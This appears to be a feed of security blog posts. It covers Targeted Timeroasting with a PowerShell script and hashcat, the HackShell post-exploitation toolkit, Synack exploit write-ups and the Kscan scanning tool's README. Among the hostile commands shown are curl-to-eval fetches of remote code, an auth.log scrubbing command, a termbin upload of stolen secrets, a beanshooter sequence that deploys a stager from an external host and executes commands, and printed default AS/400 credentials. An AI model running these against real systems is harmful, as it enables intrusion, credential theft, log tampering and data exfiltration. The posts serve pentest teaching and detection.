Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

PowerShell For Hackers, Part 10: Timeroasting Users

10 January 2026 at 10:59

Welcome back, aspiring cyberwarriors!

We continue our PowerShell for Hackers series with another article that shows how PowerShell can be used during real pentests and purple team engagements. Today we are going to explore an attack called Timeroasting. However, instead of focusing only on computers, we will look at how a modified script can be used to abuse user accounts as well. The final result of this technique is a user hash that is already formatted to be cracked with hashcat.

Before we go any deeper, there is something important to clarify. This attack relies on modifying properties of user accounts inside Active Directory. That means you must already have domain administrator privileges. Normally, when an attacker compromises a domain admin account, the game is over for the organization. That account gives unrestricted control over the domain. But even with that level of privilege, there are still times when you may want credentials for a specific domain user, and you do not want to trigger obvious high-risk actions.

Defenders can monitor techniques such as dumping NTDS, extracting LSASS memory, or performing DCSync. There are situations where those methods are either blocked, monitored, or simply not ideal. The script we are discussing today exists exactly for such cases. It helps retrieve hashes in a way that may blend more quietly into normal domain behavior.

Timeroasting

You may be wondering what Timeroasting actually is. Timeroasting is a technique originally designed to obtain hashes from domain computers rather than users. It abuses a weakness in how certain computer and trust accounts store passwords in Active Directory. These machine passwords are then used to compute MS-SNTP authentication material, which attackers can collect and later attempt to crack offline. Normally, computer accounts in a domain have very long, randomly generated passwords. Because of that complexity, cracking them is usually impractical. However, this was not always the case. Older systems, including so-called “Pre-Windows 2000 Computers,” sometimes stored weak or predictable passwords. These legacy systems are what made Timeroasting especially interesting.

The attack was originally discovered and documented by Tom Tervoort from Secura. He showed how weak computer or trust account passwords in Active Directory could be exploited. For example, if a computer account had enough rights to perform DCSync, and its password was weak enough, you might even use the computer name itself as the password during attacks such as DCSync. The problem is that for modern systems, machine passwords are long and complex. Running those hashes through even powerful wordlists can take a very long time and still fail. That is why the use of the original Timeroasting attack was quite limited.

This limitation was addressed by Giulio Pierantoni, who took the original idea and upgraded it. He demonstrated that domain user accounts could also be abused in a similar way, which significantly changes the value and use-cases of this attack.

Targeted Timeroasting

Giulio Pierantoni called this technique “Targeted Timeroasting,” similar in spirit to Targeted Kerberoasting and AS-REP Roasting. Since domain administrators can modify attributes of user accounts, you can temporarily convert a user account into something that looks like a domain machine account, you can convince the domain controller to treat it as such and return a hash for it. In other words, the domain controller believes the account is a computer, and therefore exposes authentication material normally associated with machine accounts, except now it belongs to a human user.

Every Active Directory user object has a field called sAMAccountType. This field defines what kind of account it is. Under normal circumstances, regular users and machine accounts have different values. For example, a normal user account belongs to the SAM_NORMAL_USER_ACCOUNT category, while a machine account belongs to SAM_MACHINE_ACCOUNT.

account properties in active directory

Although you cannot directly modify this field, there is another attribute called userAccountControl. This is a set of flags that determines the characteristics of the account. Some of these flags correspond to workstations, servers, or domain controllers. When the userAccountControl value is changed to the flag representing a workstation trust account, the sAMAccountType attribute is automatically updated. The domain controller then believes it is dealing with a machine account.

Under normal security rules, you are not supposed to be able to convert one type of account into another. However, domain administrators are exempt from this limitation. That is exactly what makes Targeted Timeroasting possible. This technique cannot be executed by unprivileged users and is therefore different from things like Targeted Kerberoasting, AS-REP roasting, shadow credentials, or ESC14.

microsoft requirements for user account modifications

Before the hash is computed, the domain controller also checks that the sAMAccountName ends with a dollar sign. For domain administrators, changing this is trivial unless another account with the same name already exists. Once the userAccountControl and sAMAccountName values have been modified, the controller is willing to hand out the MS-SNTP hash for the account to anyone who asks appropriately.

There is one important operational warning shared by Giulio Pierantoni. When a user account is converted into a workstation trust account, that user will lose the ability to log into workstations. However, this does not affect existing active sessions. If you immediately revert the attributes after extracting the hash, the user will likely never notice anything happening.

loggin in as a modifed user that is now a machine account

Exploitation

A rough proof-of-concept script was created by modifying Jacopo Scannella’s original PowerShell Timeroasting script. The script is now available on GitHub.

To use it, you need to be a domain administrator running from a domain-joined system that already has the Active Directory PowerShell module installed.

The script works in several logical steps. It first retrieves important attributes such as the objectSid and userAccountControl values for the target account. Then it changes the userAccountControl attribute so that the account is treated as a workstation trust account. After that, it appends a dollar sign to the sAMAccountName, making the user look like a machine account. Once the attributes are updated, the script extracts the RID, sends a client MS-SNTP request to the domain controller, and retrieves the resulting hash from the response. Finally, it restores all the original values so that nothing appears out of the ordinary.

When observed in packet captures, the whole exchange looks like a simple NTP transaction. There is a request containing the RID and a response containing a signature generated from the NT hash of the account. The salt is also drawn from the NTP response packet.

analyzing traffic during a timeroast attack

The author of the modified script provided two usage modes. One mode allows you to target specific users individually. Another mode allows you to abuse every user in a supplied list.

To target a specific user, you would normally run:

PS > .\TargetedTimeroast.ps1 -domainController IP -v -victim USERNAME

timeroasting a user

If you want to target multiple users at once, you prepare a list and run:

PS > .\TargetedTimeroast.ps1 -v -file .\users.txt -domainController IP

timeroasting users

Hashcat

Once you have collected the hashes you want, you can move to your Kali machine and begin cracking them with hashcat. It is recommended that you remove the RIDs from each hash to avoid issues during cracking. Your command will look like this:

bash$ > sudo hashcat -a 0 -m 31300 hashes.txt dictionary.txt

If the password is weak or reused, you may recover it relatively quickly.

cracking hashes after timeroasting

Detection

Defenders should find this section important. Even though this attack requires domain administrator privileges, it should still be monitored, because insider threats or compromised admins do exist. There are several key behaviors that may indicate that Timeroasting or Targeted Timeroasting is taking place. One example is when a single host sends many MS-SNTP client requests, but those requests include different RIDs. Another example is when the RIDs in those requests belong to user accounts instead of normal computer accounts. You may also observe that the userAccountControl value of one or more user accounts changes from a normal user value to a workstation trust account value and then back again soon afterward. In addition, the sAMAccountName of a user account may briefly have a dollar sign added to the end.

These behaviors are unusual in normal environments. If they are monitored properly, attackers will have far fewer opportunities to exploit this weakness. Unfortunately, such monitoring is quite rare in many organizations.

Summary

This is a new creative application of a long-known attack concept. It is very likely that this technique will be adopted by a wide range of attackers, from red teamers to malicious actors. We should also remember the risk of insider threats, because a domain administrator could easily perform this technique without escalating privileges any further. The process is surprisingly straightforward when the correct level of access already exists.

Users should therefore aim to use strong, complex passwords inside corporate domains, not just meeting but exceeding the minimum policy requirements. It is also wise never to reuse passwords or even reuse the same style of password across different systems. Wherever possible, two-factor authentication should be enabled. Good architecture and strong monitoring will make techniques like Targeted Timeroasting far less attractive and much easier to detect.

In our continuing effort to offer you the very best in cybersecurity training, Hackers-Arise is proud to preset PowerShell for Hackers training. It is included with the Subscriber and Subscriber Pro packages. March 10-12.

Linux: HackShell – Bash For Hackers

7 January 2026 at 10:15

Welcome back, aspiring cyberwarriors!

In one of our Linux Forensics articles we discussed how widespread Linux systems are today. Most of the internet quietly runs on Linux. Internet service providers rely on Linux for deep packet inspection. Websites are hosted on Linux servers. The majority of home and business routers use Linux-based firmware. Even when we think we are dealing with simple consumer hardware, there is often a modified Linux kernel working in the background. Many successful web attacks end with a Linux compromise rather than a Windows one. Once a Linux server is compromised, the internal network is exposed from the inside. Critical infrastructure systems also depend heavily on Linux. Gas stations, industrial control systems, and even CCTV cameras often run Linux or Linux-based embedded firmware.

Master OTW has an excellent series showing how cameras can be exploited and later used as proxies. Once an attacker controls such a device, it becomes a doorway into the organization. Cameras are typically reachable from almost everywhere in the segmented network so that staff can view them. When the camera is running cheap and vulnerable software, that convenience can turn into a backdoor that exposes the entire company. In many of our forensic investigations we have seen Linux-based devices like cameras, routers, and small appliances used as the first foothold. After gaining root access, attackers often deploy their favorite tools to enumerate the environment, collect configuration files, harvest credentials, and sometimes even modify PAM to maintain silent persistence.

So Bash is already a powerful friend to both administrators and attackers. But we can make it even more stealthy and hacker friendly. We are going to explore HackShell, a tool designed to upgrade your Bash environment when you are performing penetration testing. HackShell was developed by The Hacker’s Choice, a long-standing hacking research group known for producing creative security tools. The tool is actively maintained, loads entirely into memory, and does not need to write itself to disk. That helps reduce forensic artifacts and lowers the chance of triggering simple detections.

If you are a defender, this article will also be valuable. Understanding how tools like HackShell operate will help you recognize the techniques attackers use to stay low-noise and stealthy. Network traffic and behavioral traces produced by these tools can become intelligence signals that support your SIEM and threat detection programs.

Let’s get started.

Setting Up

Once a shell session has been established, HackShell can be loaded directly into memory by running either of the following commands:

bash$ > source <(curl -SsfL https://thc.org/hs)

Or this one:

bash$ > eval "$(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)"

setting up hackshell

You are all set. Once HackShell loads, it performs some light enumeration to collect details about the current environment. For example, you may see output identifying suspicious cron jobs or even detecting tools such as gs-netcat running as persistence. That early context already gives you a sense of what is happening on the host.

But if the compromised host does not have internet access, for example when it sits inside an air-gapped environment, you can manually copy and paste the contents of the HackShell script after moving to /dev/shm. On very old machines, or when you face compatibility issues, you may need to follow this sequence instead.

First run:

bash$ > bash -c 'source <(curl -SsfL https://thc.org/hs); exec bash'

And then follow it with:

bash$ > source <(curl -SsfL https://thc.org/hs)

Now we are ready to explore its capabilities.

Capabilities

The developers of HackShell clearly put a lot of thought into what a penetration tester might need during live operations. Many helpful functions are built directly into the shell. You can list these features using the xhelp command, and you can also request help on individual commands using xhelp followed by the command name.

hackshell capabilitieshelp menu

We will walk through some of the most interesting ones. A key design principle you will notice is stealth. Many execution methods are chosen to minimize traces and reduce the amount of forensic evidence left behind.

Evasion

These commands will help you reduce your forensic artefacts. 

xhome

This command temporarily sets your home directory to a randomized path under /dev/shm. This change affects only your current HackShell session and does not modify the environment for other users who log in. Placing files in /dev/shm is popular among attackers because /dev/shm is a memory-backed filesystem. That means its contents do not persist across reboots and often receive less attention from casual defenders.

bash$ > xhome

hackshell xhome command

For defenders reading this, it is wise to routinely review /dev/shm for suspicious files or scripts. Unexpected executable content here is frequently a red flag.

xlog

When attackers connect over SSH, their login events typically appear in system authentication logs. On many Linux distributions, these are stored in auth.log. HackShell includes a helper to selectively remove traces from the log.

For example:

bash$ > xlog '1.2.3.4' /var/log/auth.log

xtmux

Tmux is normally used by administrators and power users to manage multiple terminal windows, keep sessions running after disconnects, and perform long-running tasks. Attackers abuse the same features. In several forensic cases we observed attackers wiping storage by launching destructive dd commands inside tmux sessions so that data erasure would continue even if the network dropped or they disconnected.

This command launches an invisible tmux session:

bash$ > xtmux

Enumeration and Privilege Escalation

Once you have shifted your home directory and addressed logs, you can begin to understand the system more deeply.

ws

The WhatServer command produces a detailed overview of the environment. It lists storage, active processes, logged-in users, open sockets, listening ports, and more. This gives you a situational awareness snapshot and helps you decide whether the machine is strategically valuable.

hackshell ws command

lpe

LinPEAS is a well-known privilege escalation auditing script. It is actively maintained, frequently updated, and widely trusted by penetration testers. HackShell integrates a command that runs LinPEAS directly in memory so the script does not need to be stored on disk.

bash$ > lpe

hackshell lpe command
hackshell lpe results

The script will highlight possible paths to privilege escalation. In the example environment we were already root, which meant the output was extremely rich. However, HackShell works well under any user account, making it useful at every stage of engagement.

hgrep

Credential hunting often involves searching through large numbers of configuration files or text logs. The hgrep command helps you search for keywords in a simple and direct way.

bash$ > hgrep pass

hackshell hgrep

This can speed up the discovery of passwords, tokens, keys, or sensitive references buried in files.

scan

Network awareness is critical during lateral movement. HackShell’s scan command provides straightforward scanning with greppable output. You can use it to check for services such as SMB, SSH, WMI, WINRM, and many others.

You can also search for the ports commonly associated with domain controllers, such as LDAP, Kerberos, and DNS, to identify Active Directory infrastructure. Once domain credentials are obtained, they can be used for enumeration and further testing. HTTP scanning is also useful for detecting vulnerable web services.

Example syntax:

bash$ > scan PORT IP

hackshell scan command

loot

For many testers, this may become the favorite command. loot searches through configuration files and known locations in an effort to extract stored credentials or sensitive data. It does not always find everything, especially when environments use custom paths or formats, but it is often a powerful starting point.

bash$ > loot

looting files on linux with hackshell

If the first pass does not satisfy you:

bash$ > lootmore

When results are incomplete, combining loot with hgrep can help you manually hunt for promising strings and secrets.

Lateral Movement and Data Exfiltration

When credentials are discovered, the next step may involve testing access to other machines or collecting documents. It is important to emphasize legal responsibility here. Mishandling exfiltrated data can expose highly sensitive information to the internet, violating agreements.

tb

The tb command uploads content to termbin.com. Files uploaded this way become publicly accessible if someone guesses or brute forces the URL. This must be used with caution. 

bash$ > tb secrets.txt

hackshell tb command

After you extract data, securely deleting the local copy is recommended.

bash$ > shred secrets.txt

hackshell shred command

xssh and xscp

These commands mirror the familiar SSH and SCP tools and are used for remote connections and secure copying. HackShell attempts to perform these actions in a way that minimizes exposure. Defenders are continuously improving monitoring, sometimes sending automatic alerts when new SSH sessions appear. If attackers move carelessly, they risk burning their foothold and triggering incident response. 

Connect to another host:

bash$ > xshh root@IP

Upload a file to /tmp on the remote machine:

bash$ > xscp file root@IP:/tmp

Download a file from the remote machine to /tmp:

bash$ > xscp root@IP:/root/secrets.txt /tmp

Summary

HackShell is an example of how Bash can be transformed into a stealthy, feature-rich environment for penetration testing. There is still much more inside the tool waiting to be explored. If you are a defender, take time to study its code, understand how it loads, and identify the servers it contacts. These behaviors can be turned into Indicators of Compromise and fed into your SIEM to strengthen detection.

If ethical hacking and cyber operations excite you, you may enjoy our Cyberwarrior Path. This is a three-year training journey built around a two-tier education model. During the first eighteen months you progress through a rich library of beginner and intermediate courses that develop your skills step by step. Once those payments are complete, you unlock Subscriber Pro-level training that opens the door to advanced and specialized topics designed for our most dedicated learners. This structure was created because students asked for flexibility, and we listened. It allows you to keep growing and improving without carrying an unnecessary financial burden, while becoming the professional you want to be.

The post Linux: HackShell – Bash For Hackers first appeared on Hackers Arise.

Exploits Explained: Default Credentials Still a Problem Today

9 February 2023 at 13:51

Popeax is a member of the Synack Red Team.

Often people think security research requires deep knowledge of systems and exploits, and sometimes it does, but in this case all it took was some curiosity and a Google search to find an alarmingly simple exploit using default credentials.

On a recent host engagement, I discovered an unusual login page running on port 8080, a standard but less often used HTTP port. The login page did not resemble anything I had encountered in the thousands of login pages across hundreds of client engagements.

Nothing new. Even for a seasoned member of the Synack Red Team (SRT), it isn’t unusual to discover commercial products that one hasn’t seen before.

The login page clearly showed the product as some type of IBM server. In the URL, I noticed the string “profoundui.” A quick Internet search identified an IBM resource that stated:

“Profound UI is a graphical, browser-based framework that makes it easy to transform existing RPG applications into Web applications, or develop new rich Web and mobile applications that run on the IBM i (previously known as the AS/400, iSeries, System i) platform using RPG, PHP, or Node.js.”

Given these facts, I Googled for “IBM AS/400 default password” and found IBM documentation that listed default AS/400 credentials.

As any elite hacker would do, I copied and pasted all six default usernames and passwords into the login form.

Sure enough the last set of credentials worked with user QSRVBAS and password QSRVBAS.

It was beyond the scope of the engagement to proceed any further to see how much access was possible. The vulnerability was documented in the report that was given to the client to be remediated.

After a few days, the client requested a patch verification of the vulnerability using Synack’s patch verification workflow. This workflow allows a client to request the SRT to verify an implemented patch within the Synack Platform. After receiving the patch verification request, I quickly verified the vulnerability was no longer exploitable.

It is hard to believe, but even today commercial products still ship and are installed with default credentials. Often the onus is on the end user to be aware they must change the credentials and lock the default accounts.

The ingenuity and curiosity of the SRT cannot be replicated by scanners or automated technology. The SRT members are adept at finding this type of vulnerability in custom and commercial applications, even while running in obscure locations, which leads to exploitable vulnerabilities being surfaced to the customer.

The post Exploits Explained: Default Credentials Still a Problem Today appeared first on Synack.

Synack’s Top 5 Vulnerabilities Found in 2022

6 February 2023 at 06:00

IT and Cybersecurity leaders need the clearest picture of their networks and assets to understand if their organizations are at risk and what to do about it. When it comes to looking ahead at zero day vulnerabilities, it can be helpful for leaders to first look back to understand the collective strengths and weaknesses of the cybersecurity industry and the effects they’ve had on the different risks and threats it’s tasked with analyzing and preventing.

As a helpful tool for 2023 strategic cybersecurity planning, we’re highlighting the most common vulnerability categories found in 2022, across more than 27,000 discovered vulnerabilities by the Synack Red Team. Each of these vulnerabilities have the potential to pose significant threats to large organizations and will continue to be monitored as we move through the year.

Here are the top five vulnerability categories found by Synack in 2022:

#1 Authorization Permission

The most common vulnerability found in 2022 relates to improper authorizations. With authorizations, a user’s right to “access a given resource [is] based on the user’s privileges and any permissions or other access-control specifications that apply to the resource.” In this case, unauthorized users may gain access to resources or initiate unwanted actions that they should not be allowed to perform, potentially leading to data exposures, DoS or arbitrary code execution.

#2 Cross Site Request Forgery

The runner up vulnerability is Cross Site Request Forgery (CSRF), which is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

#3 Information Disclosure

Information Disclosure can occur due to security mistakes which expose sensitive information to an actor that is not explicitly authorized to have access to that information. Information exposures can occur in different ways, resulting from mistakes that occur in behaviors that explicitly manage, store, transfer or cleanse sensitive information. 

#4 SQL Injection

This attack style consists of insertion or injection of a SQL query via the input data from client to application. A successful exploit of this style can read and even modify sensitive data, execute admin functions (including shutting down systems), and in some cases, issue commands to an operating system.

#5 Authentication Session Management

Broken Authentication Session Management vulnerabilities round out the Top 5 found by Synack in 2022. Websites may require users to login using a username and password, MFA or other authentication schemes, which may contain exploitable vulnerabilities. The site will assign and send each logged in visitor a unique session ID that serves as a key to the user’s identity on the server, if the session ID is not properly secured a cybercriminal can impersonate a valid user and access that user’s account.

How to Reduce Your Exposure to a Top 5 Vulnerability

Synack offers an offensive security testing platform allowing enterprise customers to track exploitable vulnerabilities in their environment and to close security gaps before they can be exploited by bad actors. The Synack Platform pairs the Synack Red Team, a community of 1,500 expert and vetted adversarial researchers, with the machine intelligence in our platform. Synack’s security testing missions cover web assets and host assets, as well as mobile, cloud and API security.

If you’re not penetration testing on a continuous basis, you should be. Talk to your Synack rep or your authorized security sales representative to learn more about strategic security testing.

The post Synack’s Top 5 Vulnerabilities Found in 2022 appeared first on Synack.

Exploits Explained: Java JMX’s Exploitation Problems and Resolutions

2 February 2023 at 13:39

Nicolas Krassas is a member of the Synack Red Team and has earned distinctions such as SRT Envoy and Guardian of Trust.

Of all the Synack targets, my favorite ones are always host assessments. There, one can find a multitude of services with different configurations, versions and usage. One that always caused me trouble was the Java RMI case, until I decided to spend time reviewing the process step by step.

Throughout the years there were several targets where skilled Synack Red Team (SRT) members were able to successfully exploit vulnerabilities with Remote Code Execution, and this information in many cases was missing from my arsenal. I set a goal to find out how the exploitation was taking place and to be able to better understand the tools and methods to finding and exploiting it.

A few “good to know” items:

What is Java RMI used for?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

What is JMX?

Wikipedia describes Java Management Extensions (JMX) as follows, “Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks.”

JMX is often described as the “Java version” of SNMP (Simple Network Management Protocol). SNMP is mainly used to monitor network components like network switches or routers. Like SNMP, JMX is also used for monitoring Java-based applications. The most common use case for JMX is monitoring the availability and performance of a Java application server from a central monitoring solution like Nagios, Icinga or Zabbix.

JMX also shares another similarity with SNMP: While most companies only use the monitoring capabilities, JMX is actually much more powerful. JMX allows the user not only to read values from the remote system, it can also be used to invoke methods on the system.

JMX fundamentals: MBeans

JMX allows you to manage resources as managed beans (MBean). An MBean is a Java Bean class that follows certain design rules of the JMX standard. An MBean can represent a device, an application or any resource that needs to be managed over JMX. You can access these MBeans via JMX, query attributes and invoke Bean methods.

The JMX standard differs between various MBean types; however, we will only deal with the standard MBeans here. To be a valid MBean, a Java class must:

  • Implement an interface
  • Provide a default constructor (without any arguments)
  • Follow certain naming conventions, for example implement getter/setter methods to read/write attributes

MBean server

An MBean server is a service that manages the MBeans of a system, which we’ll see demonstrated in an attack later in this post. Developers can register their MBeans in the server following a specific naming pattern. The MBean server will forward incoming messages to the registered MBeans. The service is also responsible for forwarding messages from MBeans to external components.

After we have a JMX service running on RMI, we can go through the various ways such a service might be attacked. Over time, various attack techniques have been discovered that are related to JMX over RMI, and we will step through most of them one by one.

Abusing available MBeans

Applications are able to register additional MBeans, which can then be invoked remotely. JMX is commonly used for managing applications, therefore the MBeans are often very powerful.

A failed start

Starting research on the topic, the first items that one will see are references to rmiscout, an exceptional tool on the time that was created but not maintained anymore for over two years with several issues on deployment. At that time I moved on BaRMie, which surprisingly is even older than rmiscout but easier to work with for basic recon. An alternative tool, under the name mjet, seems to be more updated and somewhat easier to use but still my results were poor. As one can see right away, many times simply taking a tool from the shelves and trying to work with it is not a solution.

Back to school

Simply using the tools without understanding exactly what they do won’t work in the long run and that’s something that I was aware of from the start. But everybody is looking for shortcuts.  Back to reading then, and starting with posts such as this one and this one. I ended up on a relatively recent presentation from Tobias Neitzel, where he also presented his tools, RMG and Beanshooter.

New tools, new methods

With a better understanding and with a pair of excellent tools, the results were the following over the next months. 

On a target with several weeks already being launched, the RMI service was not noticed or exploited at that time. The following steps provided an RCE case.

Identifying:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  enum server_ip 9999

Tonka bean deployment:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy server_ip 9999 –stager-url http://tupoc:8888 –no-stager

On our Tupoc (external Synack collaborator system) 

Waiting for a callback:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar stager xxx.xx.xx.xx 8888 tonka

Verification:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka status server_ip 9999 

Command execution:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka exec server_ip 9999 id

The case was awarded with a full RCE reward.

Not all cases will happen to be straightforward and in rare occasions issues might arise, but with better understanding of the process and the tools, we are always able to achieve better results.

References:
https://www.youtube.com/watch?v=t_aw1mDNhzI (Amazing work by Tobias Neitzel)
https://docs.jboss.org/jbossas/jboss4guide/r5/html/ch2.chapter.html
https://docs.alfresco.com/content-services/7.0/admin/jmx-reference/

Final notes

During the process, a few issues were identified in the tools that were handled swiftly and additionally an issue was created towards Glassfish repo under, https://github.com/eclipse-ee4j/glassfish/issues/24223.

The post Exploits Explained: Java JMX’s Exploitation Problems and Resolutions appeared first on Synack.

PNPT: Certification Review

By: BHIS
31 January 2023 at 07:52

Daniel Pizarro // What is the PNPT?  The Practical Network Penetration Tester (PNPT), created by TCM Security (TCMS), is a 5-day ethical hacking certification exam that assesses a pentester’s ability […]

The post PNPT: Certification Review appeared first on Black Hills Information Security.

Forward into 2023: Browser and O/S Security Features 

By: BHIS
18 January 2023 at 11:38

Joff Thyer // Introduction We have already arrived at the end of 2022; wow, that was fast. As with any industry or aspect of life, we find ourselves peering into […]

The post <strong>Forward into 2023: Browser and O/S Security Features</strong>  appeared first on Black Hills Information Security.

Kscan - Simple Asset Mapping Tool

By: Unknown
18 January 2023 at 06:30


0 Disclaimer (The author did not participate in the XX action, don't trace it)

  • This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.

  • When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.

We reserve the right to pursue your legal responsibility if the above prohibited behavior is found.

If you have any illegal behavior in the process of using this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint responsibility.

Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.

Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this Agreement in any other express or implied manner shall be deemed that you have read and agreed to be bound by this Agreement.

1 Introduction

 _   __
|#| /#/ Lightweight Asset Mapping Tool by: kv2
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#|
|##| |#|___ |#| /###\ |##\|#|
|#.#\ \#####\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
|#| \#\\#####/ \#####/#/ \#\#| \#|

Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute force cracking on scan results, and is the first open source RDP brute force cracking tool on the go platform.

2 Foreword

At present, there are actually many tools for asset scanning, fingerprint identification, and vulnerability detection, and there are many great tools, but Kscan actually has many different ideas.

  • Kscan hopes to accept a variety of input formats, and there is no need to classify the scanned objects before use, such as IP, or URL address, etc. This is undoubtedly an unnecessary workload for users, and all entries can be normal Input and identification. If it is a URL address, the path will be reserved for detection. If it is only IP:PORT, the port will be prioritized for protocol identification. Currently Kscan supports three input methods (-t,--target|-f,--fofa|--spy).

  • Kscan does not seek efficiency by comparing port numbers with common protocols to confirm port protocols, nor does it only detect WEB assets. In this regard, Kscan pays more attention to accuracy and comprehensiveness, and only high-accuracy protocol identification , in order to provide good detection conditions for subsequent application layer identification.

  • Kscan does not use a modular approach to do pure function stacking, such as a module obtains the title separately, a module obtains SMB information separately, etc., runs independently, and outputs independently, but outputs asset information in units of ports, such as ports If the protocol is HTTP, subsequent fingerprinting and title acquisition will be performed automatically. If the port protocol is RPC, it will try to obtain the host name, etc.

3 Compilation Manual

Compiler Manual

4 Get started

Kscan currently has 3 ways to input targets

  • -t/--target can add the --check parameter to fingerprint only the specified target port, otherwise the target will be port scanned and fingerprinted
IP address: 114.114.114.114
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
  • --spy can add the --scan parameter to perform port scanning and fingerprinting on the surviving C segment, otherwise only the surviving network segment will be detected
[Empty]: will detect the IP address of the local machine and detect the B segment where the local IP is located
[all]: All private network addresses (192.168/172.32/10, etc.) will be probed
IP address: will detect the B segment where the specified IP address is located
  • -f/--fofa can add --check to verify the survivability of the retrieval results, and add the --scan parameter to perform port scanning and fingerprint identification on the retrieval results, otherwise only the fofa retrieval results will be returned
fofa search keywords: will directly return fofa search results

5 Instructions

usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]


optional arguments:
-h , --help show this help message and exit
-f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
-t , --target Specify the detection target:
IP address: 114.114.114.114
IP address segment: 114.114.114.114/24, subnet mask less than 12 is not recommended
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
--spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
(empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
--check Fingerprinting the target address, only port detection will not be performed
--scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
-p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
-eP, --excluded-port skip scanning specified ports,support:80,8080,8088-8090
-o , --output save scan results to file
-oJ save the scan results to a file in json format
-Pn After using this parameter, intelligent survivability detection will not be performed. Now intelligent survivability detection is enabled by default to improve efficiency.
-Cn With this parameter, the console output will not be colored.
-sV After using this parameter, all ports will be probed with full probes. This parameter greatly affects the efficiency, so use it with caution!
--top Scan the filtered common ports TopX, up to 1000, the default is TOP400
--proxy set proxy (socks5|socks4|https|http)://IP:Port
--threads thread parameter, the default thread is 100, the maximum value is 2048
--path specifies the directory to request access, only a single directory is supported
--host specifies the header Host value for all requests
--timeout set timeout
--encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
--match returns the banner to the asset for retrieval. If there is a keyword, it will be displayed, otherwise it will not be displayed
--hydra automatic blasting support protocol: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all are enabled by default
hydra options:
--hydra-user custom hydra blasting username: username or user1,user2 or file:username.txt
--hydra-pass Custom hydra blasting password: password or pass1,pass2 or file:password.txt
If there is a comma in the password, use \, to escape, other symbols do not need to be escaped
--hydra-update Customize the user name and password mode. If this parameter is carried, it is a new mode, and the user name and password will be added to the default dictionary. Otherwise the default dictionary will be replaced.
--hydra-mod specifies the automatic brute force cracking module: rdp or rdp, ssh, smb
fofa options:
--fofa-syntax will get fofa search syntax description
--fofa-size will set the number of entries returned by fofa, the default is 100
--fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter

The function is not complicated, the others are explored by themselves

6 Demo

6.1 Port Scan Mode

6.2 Survival network segment detection

6.3 Fofa result retrieval

6.4 Brute-force cracking

6.5 CDN identification



New PowerShell History Defense Evasion Technique

By: BHIS
29 November 2022 at 11:15

Carrie Roberts // PowerShell incorporates the handy feature of writing commands executed to a file to make them easy to refer back to later. This functionality is provided by the […]

The post New PowerShell History Defense Evasion Technique appeared first on Black Hills Information Security.

The Top 5 Cybersecurity Vulnerabilities for Government Agencies in 2022

19 January 2023 at 11:31

Government agencies are faced with cybersecurity challenges from all sides. Digital transformation initiatives can expose weak points in an attack surface, putting pressure on agencies’ IT teams to get it just right. And from insider threats to persistent vulnerabilities within networks and operating systems, public sector leaders feel the urgency to obtain a clear picture of what’s most at-risk.

As we kick off 2023, the Synack Red Team reviewed the most common vulnerabilities found in 2022. Each of these vulnerabilities have the potential to pose significant threats to large organizations—governments and beyond—and will continue to be monitored as we move through 2023.

Here are the top 5 vulnerability categories found by Synack in government accounts in 2022:

#5: Remote Execution

Remote Code Execution refers to a vulnerability where an unauthenticated attacker can remotely execute commands to place malware or malicious code on your network or hardware.

#4: Brute Force

In a brute force attack, attackers utilize exhaustive key searches to constantly search and systematically check possible passwords or passphrases until the correct one is found. This can lead to successful phishing attacks and more.

#3: SQL Injection

This attack style consists of insertion or injection of a SQL query via the input data from client to application. A successful exploit of this style can read and even modify sensitive data, execute admin functions (including shutting down systems), and in some cases, issue commands to an operating system.

 

 #2: Authorization Permissions

